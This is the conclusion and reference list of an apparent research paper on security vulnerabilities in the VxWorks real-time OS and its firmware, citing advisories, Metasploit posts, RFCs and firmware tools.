12 Conclusion
In this paper, we described the existing security vulnerabilities in VxWorks OS
and firmware. We conducted experiments to verify the potential impact of these
vulnerabilities to understand the inherent security model of VxWorks. The anal-
ysis revealed new security issues in VxWorks firmware. VxWorks are exposed
to a specific set of security issues inspite of being a real time OS which ensures
that is quite secure than other open source models. Nonetheless, VxWorks is
restricted as it does not allow extensible operations to be performed in order to
avoid many default configuration bugs. vulnerabilities discussed and validated
in this experiment have not been patched yet but Wind River system knows
about them. VxWorks is still utilized in heavy volumes in embedded devices
owing to its feasibility of implementation in different environments.
21
22. 13 References
[1] Wind River Systems, High-Availability CompactPCI Systems: Introduction
to Foundation HA, COTS Journal, September 2003, 47-53.
[2] T. Anderson, T. Grabbe, J. Hammersley, et al., Providing Open Architecture
High Availability Solutions, HA Forum, February 2001.
[3] SecurityFocus, Multiple Vendors IPv6 Neighbor Discovery Protocol Imple-
mentation Address Spoofing Vulnerability,http://www.securityfocus.com/bid/31529/info
[4] Metasploit Blog, Shiny Old VXWorks Vulnerabilities, http://blog.metasploit.com/2010/08/vxworks-
vulnerabilities.html
[5] Metasploit, http://www.metasploit.com
[6] Securityfocus Vulnerability Database , VxWorks Debugging Service Security-
Bypass Vulnerability, http://www.securityfocus.com/bid/42158
[7] Open WRT Docs, CFE - Common Firmware Environment, http://oldwiki.openwrt.org/OpenWrtDocs
%282f%29Customizing%282f%29Firmware%282f%29CFE.html
[8] CFE - Common Firmware Environment Image Tool, http://www.bitsum.com/files/wrt vx imgtool.zip
[9] RFC 2461, http://www.ietf.org/rfc/rfc2461.txt
[10] VxWorks Check Stack(), Vxworks Configuration Documentation, http://www.eso.org/projects/vlt/sw-
dev/wwwdoc/ADD-DOC/VLT-MAN-ESO-17210-0667/Output/configuration.html
[11] Rapid7, List of Vulnerable Devices - VxWorks, http://www.metasploit.com/data/confs/bsideslv2010/
VxWorksDevices.xls
[12] RFC 3513, http://www.ietf.org/rfc/rfc3513.txt
[13] DD-WRT,http://www.dd-wrt.com/site/index
[14] L. Sha, R. Rajkumar, and J. P. Lehoczky. Priority Inheritance Protocols:
An Approach to Real-Time Synchronization. In IEEE Transactions on Com-
puters,vol. 39, pp. 1175-1185, Sep. 1990.
[15] LEON VxWorks 6.5 BSP Manual, http://www.gaisler.com/doc/vxworks-
bsps-6.5-1.1.2.0.pdf
[16] VxWorks Boot Sequence Program (BSP) Manipulation Utility, http://www.bitsum.com
/files/bsptool.zip
22
23. [17] OpenSSL, http://www.openssl.org
[18] Wek-Tek Sai, VxWorks and Tornado, http://asusrl.eas.asu.edu/cse494/content/realtime/
Vxworks&Tornado.pdf
[19] Achillers Industry Certification Program, http://www.wurldtech.com/cyber-
security/achilles-certification.aspx
[20] Blog, Wind River Introduces Worlds First Wurldtech Achilles Certified
Real-Time Operating System, http://www.windriver.com/news/press/pr.html?ID=8381
[21] Cryptlib, http://www.cryptlib.com/downloads/manual.pdf
[22] Firefly, http://www.windriver.com/alliances/newdirectory/product.html?ID=1222
[23 Reverse Engineering VxWorks Firmware: WRT54Gv8, http://www.devttys0.com/2011/07/reverse-
engineering-vxworks-firmware-wrt54gv8/
[24] OWASP Top 10, https://www.owasp.org/index.php/Category:OWASP Top Ten Project
23